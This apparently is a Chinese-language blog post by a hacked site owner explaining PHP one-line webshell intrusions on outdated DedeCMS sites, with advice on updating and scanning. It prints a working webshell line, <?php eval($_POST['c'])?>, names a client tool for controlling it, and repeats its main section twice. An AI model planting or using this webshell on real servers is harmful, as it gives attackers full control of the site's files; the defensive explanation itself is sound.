首先,声明我不是黑客,我一直都是只管做站,但是一些喜欢耍小聪明的人总是靠一些小伎俩来谋取自己的利益,大家也许都碰到被挂马、黑链等等,之所以写这篇文章,是因为网站被黑,想要搞清楚被黑的伎俩原理,并非教给大家如何去黑别人的网站而获取利益。
有本事做大黑客,大黑客的职业道德我相信还是有的,黑客善于发现漏洞、利用漏洞,有些黑客还会利用漏洞善意的高速网站主程序哪方面存在隐患,这种事我也碰到过。
我碰到的问题是,有人利用程序漏洞注入php一句话木马,中秋放假搞懂了操作方法,没办法再本机上测试,想不到功能起强大超过管理员,删除添加上传,无所不能。
原理:
1.查找漏洞,很多人其实没那个本事,php、asp程序语言不精通,我不是看不起他们,他们压根看不懂,找不出漏洞,之所以他们知道,是因为很多人和我一样,程序没有升级,而这些漏洞官方已经发布,并且补丁也已经发布,这些人到处查找旧版本的程序,利用已知漏洞达到入侵的目的。
2.上传一句话木马,比如文件为test.php,程序内容只有一句话<?php eval($_POST['c'])?> ,这样的格式被称为一句话木马。如何上传每次的应用都不一样,如何避免,及时更新网站程序,保证最新版本。
3.利用一句话木马客户端登陆,php版本为零魂PHP一句话木马客户端(一键提交版) v0.2,具体什么我也搞不懂其原理,反正通过客户端链接所在网站的一句话文件http://www.test.com/test.php,,服务器所有目录一览无遗。(客户端编写修改者:http://huaidan.org/archives/3390.html)
4.一句话木马客户端一旦连接成功,可随意删除、添加文件,但是大多数只是修改文件,并且多处植入一句话木马,甚至多处目录存在其他大马(很多大马都经过加密,是免杀的),所以如果手工清理很难清干净,最好还是利用相关程序检查。
如何防范:拿dedecms为例,利用dede自带的病毒扫描文件,可疑文件要认真检查,可是如果木马被植入的并非dede的目录,还是检查不出来,因此大家还要自己去找可疑全盘检查的程序,上传至服务器这样比较快速,一旦发现确认后可立即删除。
单点日志:http://spoint.babyshoot.cn
原理:
1.查找漏洞,很多人其实没那个本事,php、asp程序语言不精通,我不是看不起他们,他们压根看不懂,找不出漏洞,之所以他们知道,是因为很多人和我一样,程序没有升级,而这些漏洞官方已经发布,并且补丁也已经发布,这些人到处查找旧版本的程序,利用已知漏洞达到入侵的目的。
2.上传一句话木马,比如文件为test.php,程序内容只有一句话<?php eval($_POST['c'])?> ,这样的格式被称为一句话木马。如何上传每次的应用都不一样,如何避免,及时更新网站程序,保证最新版本。
3.利用一句话木马客户端登陆,php版本为零魂PHP一句话木马客户端(一键提交版) v0.2,具体什么我也搞不懂其原理,反正通过客户端链接所在网站的一句话文件http://www.test.com/test.php,,服务器所有目录一览无遗。(客户端编写修改者:http://huaidan.org/archives/3390.html)
4.一句话木马客户端一旦连接成功,可随意删除、添加文件,但是大多数只是修改文件,并且多处植入一句话木马,甚至多处目录存在其他大马(很多大马都经过加密,是免杀的),所以如果手工清理很难清干净,最好还是利用相关程序检查。
如何防范:拿dedecms为例,利用dede自带的病毒扫描文件,可疑文件要认真检查,可是如果木马被植入的并非dede的目录,还是检查不出来,因此大家还要自己去找可疑全盘检查的程序,上传至服务器这样比较快速,一旦发现确认后可立即删除。
单点日志:http://spoint.babyshoot.cn
一句话木马可能已其他文件格式存在,比如图片什么,dedecms我从未更新过,因此感染过两个漏洞的入侵,今天又查找了一些一句话图片。
菜鸟来看看